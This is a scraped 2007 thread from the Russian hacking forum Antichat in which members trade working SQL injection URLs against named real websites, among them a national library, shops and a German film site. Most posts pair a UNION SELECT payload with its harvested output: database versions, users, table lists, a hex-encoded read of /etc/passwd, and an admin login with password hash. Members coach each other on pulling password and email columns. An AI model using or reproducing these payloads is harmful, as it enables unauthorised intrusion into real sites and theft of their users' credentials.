Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.10.2007, 13:26
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
chelmarket.ru
Код:
http://www.chelmarket.ru/show_goods_simple.php?cod=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/*
4.1.15-log:chelmarket:3wchelmarket@deimos.surnet.ru
kratos.ru - Кратос-компьютерс
Код:
http://www.kratos.ru/price.php?dir=3&sub=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*
4.1.22-standard-log:kratos_chel:kratos_chel@localhost
trubaopt.ru
Код:
http://www.trubaopt.ru/?page=board&pos=0&vol=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14/*&pg=126
4.0.26-log:udb2183:Uwww2183S@localhost
Таблицы не поддаются 
|
|
|
31.10.2007, 14:52
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от 0nep@t0p
http://www.odeonfilm.de/
Код:
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63,64+from+users/*
В таблице users нашел только колонку с именами - login, а вот с пассами не смог...
Version: 4.0.24_Debian-10sarge2-log
User: odeonfilm@localhost
Сайт в зоне .de, логично предположить, что колонка password может быть на немецком, т.е. passwor t =) также там есть колонка email
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,passwort,11,ema il,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31%20%20,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login, 59,60,61,62,63,64+from+users/*
|
|
|
|
31.10.2007, 15:22
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
autoindex.ru
Код:
http://www.autoindex.ru/news/index.php?id_cat=&page=1&id_news=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10/*&ye=200
4.1.18:autoindex:root@localhost
Код:
http://www.autoindex.ru/news/index.php?id_cat=&page=1&id_news=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(load_file(0x2f6574632f706173737764),0x71),0x71)),4,5,6,7,8,9,10+from+mysql.user/*&ye=200
|
|
|
|
31.10.2007, 15:22
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Российская национальная библиотека
Код HTML:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
|
|
|
|
31.10.2007, 15:39
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
КЕНТ33
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*
Раскручивай дальше:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
5.0.18-Debian_9-log:nlr_news:news_admin@localhost
28 таблиц:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(table_name,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.tables+limit+27,1/*
и т.д.
|
|
|
|
31.10.2007, 17:21
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Газета Панорама TV
+++++++++++++++++++
Инъекция:
Код:
http://www.pantv.ru/pantv/partners.asp?re=(SQL-inj)&re1=partner
Нашел одну стоящую таблицу PANTVRazdel. Сайт, вероятно, обновляется не через WEB.
Колонки таблицы:
PANTVRazdel_ID
PANTVRazdel_Name
PANTVRazdel_Active
PANTVRazdel_URL
PANTVRazdel_Menu |
|
|
|
31.10.2007, 17:33
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
KEHT33
Российская национальная библиотека
Код HTML:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*
fRg
Раскручивай дальше:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35/*
5.0.18-Debian_9-log:nlr_news:news_admin@localhost
28 таблиц:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(table _name,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35+from+information_schema.tables+limit+27,1/*
и т.д.
Есть вывод и без лимита:
http://www.nlr.ru/news/index.php?where=vybor&date_vyb1=20070401&date_vyb2 =-20070630+union+select+1,2,aes_decrypt(aes_encrypt( concat_ws(0x3a,table_schema,table_name,column_name ),0x55),0x55),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schem a.columns/*
|
|
|
|
31.10.2007, 20:09
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Код:
http://www.vdr.com.ua/cat.php?id=-1+UNION+SELECT+1,concat(user(),0x3a,database(),0x2a,version()),3,4/*
Код:
http://www.mastercity.ru/arch/show_content.php?id=74'+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+admin/*
admin:711de2ca756942dc
http://www.mastercity.ru/admin |
|
|
|
31.10.2007, 21:59
|
|
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018
Репутация:
25
|
|
Нет админки
http://dalmacija.net/site/articles/articleshow.php?id=-1+union+select+1,2,3,concat(username,char(58),pass word,char(58)),5,6,7,8,9,10,11+from+users/*
http://www.rollerclub.ru/agressive/view/fullview.php?id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),pa ssword,char(58),user_email),8,9,10,11,12,13+from+u sers+limit+1,1/*
Последний раз редактировалось JIyka; 31.10.2007 в 22:03..
|
|
|
|
31.10.2007, 22:19
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Код:
http://www.muskoka.ambulance.ca/articleshow.php?article=-1+UNION+SELECT+1,convert(version(),binary),3,4,5,6,convert(user(),binary)/*
4.1.16
masnews@localhost
Фильтрует скобку
Последний раз редактировалось -MoLoToK-; 31.10.2007 в 22:46..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
